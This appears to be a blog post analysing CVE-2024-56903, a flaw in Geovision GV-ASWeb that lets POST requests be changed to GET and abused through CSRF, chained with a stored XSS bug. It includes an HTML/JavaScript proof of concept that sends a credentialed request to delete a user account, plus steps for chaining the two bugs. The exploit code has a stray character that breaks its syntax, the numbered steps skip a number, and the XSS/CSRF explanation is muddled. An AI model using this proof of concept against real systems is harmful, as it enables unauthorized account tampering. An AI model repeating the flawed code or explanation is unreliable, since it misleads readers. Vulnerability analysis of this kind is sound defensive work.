CVE-2024-56903: Geovision GV-ASWeb Version 6.1.1. and Below Allows Attackers to Modify POST to GET for Critical Functionalities and Exploiting CSRF Attacks

CVE-2024-56903 is a critical vulnerability affecting Geovision GV-ASWeb with version 6.1.1. or less. This vulnerability allows attackers to modify a POST request method to GET requests against critical functionalities, such as account management. When coupled with another vulnerability, CVE-2024-56901, it leads to the successful execution of Cross-Site Request Forgery (CSRF) attacks on victims. This blog post aims to provide an in-depth analysis of the CVE-2024-56903 vulnerability, including a code analysis, original references, and details about the associated exploits.

Vulnerability Overview

The vulnerability in Geovision GV-ASWeb exists due to insufficient input validation and improper restriction of HTTP request methods. Attackers who exploit this vulnerability can change the request method from POST to GET in critical functionalities, such as account management. This can enable them to perform CSRF attacks, which can lead to unauthorized access and control over a victim's account.

The following code snippet demonstrates how an attacker can exploit the CVE-2024-56903 vulnerability

<!DOCTYPE html>
<html>
 <body>
   <script>
    function exploitCVE202456903() {
     var xhr = new XMLHttpRequest();
     xhr.open("GET", "https://<target-domain>/GV-ASWeb/AccountMgt/AccountList?action=delete&uid=2";, true);
     xhr.withCredentials = true;
     xhr.send(null);
    }
   </script>

  <button onclick="exploitCVE202456903()">Click Here to Exploit CVE-2024-56903</button>
 </body>
</html>

This simple HTML page contains JavaScript code that uses XMLHttpRequest to send a GET request to the targeted domain. The attacker would have to convince the victim to click on the button in order to execute the GET request. Once clicked, the attacker can delete the user with the specified UID.

Here are some essential references that provide more details about the CVE-2024-56903 vulnerability

1. CVE Details: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-56903
2. NVD: https://nvd.nist.gov/vuln/detail/CVE-2024-56903
3. Geovision Security Advisory: https://www.geovision.com.tw/GeoVision_Security_Advisory_CVE-2024-56903

Exploit Details

CVE-2024-56903 can be chained with CVE-2024-56901 for a successful CSRF attack. CVE-2024-56901 is a stored Cross-Site Scripting (XSS) vulnerability that allows attackers to inject malicious JavaScript code into a victim's browsing session. This injected code can be used to exploit CVE-2024-56903 further.

The following steps highlight how an attacker can exploit CVE-2024-56903 in conjunction with CVE-2024-56901:

1. Attacker injects malicious JavaScript code into a victim's browsing session using the stored XSS vulnerability (CVE-2024-56901).
2. The malicious JavaScript code sends a GET request to delete a user account or perform other unauthorized tasks (exploiting CVE-2024-56903).

The victim unknowingly accesses the malicious GET request while browsing.

4. The server processes the GET request, deleting the targeted user or modifying critical functionalities in the target application.

Conclusion

The CVE-2024-56903 vulnerability poses a significant threat to Geovision GV-ASWeb users, as it allows unauthorized access and modifications to critical functionalities. When combined with the CVE-2024-56901 vulnerability, attackers can execute successful CSRF attacks. For organizations using Geovision GV-ASWeb version 6.1.1. or below, it is essential to apply patches and upgrades to minimize the risk of being targeted by these types of attacks. Regularly conducting security audits and keeping software up-to-date are crucial preventive measures.

Timeline

Published on: 02/03/2025 21:15:14 UTC
Last modified on: 03/04/2025 22:15:39 UTC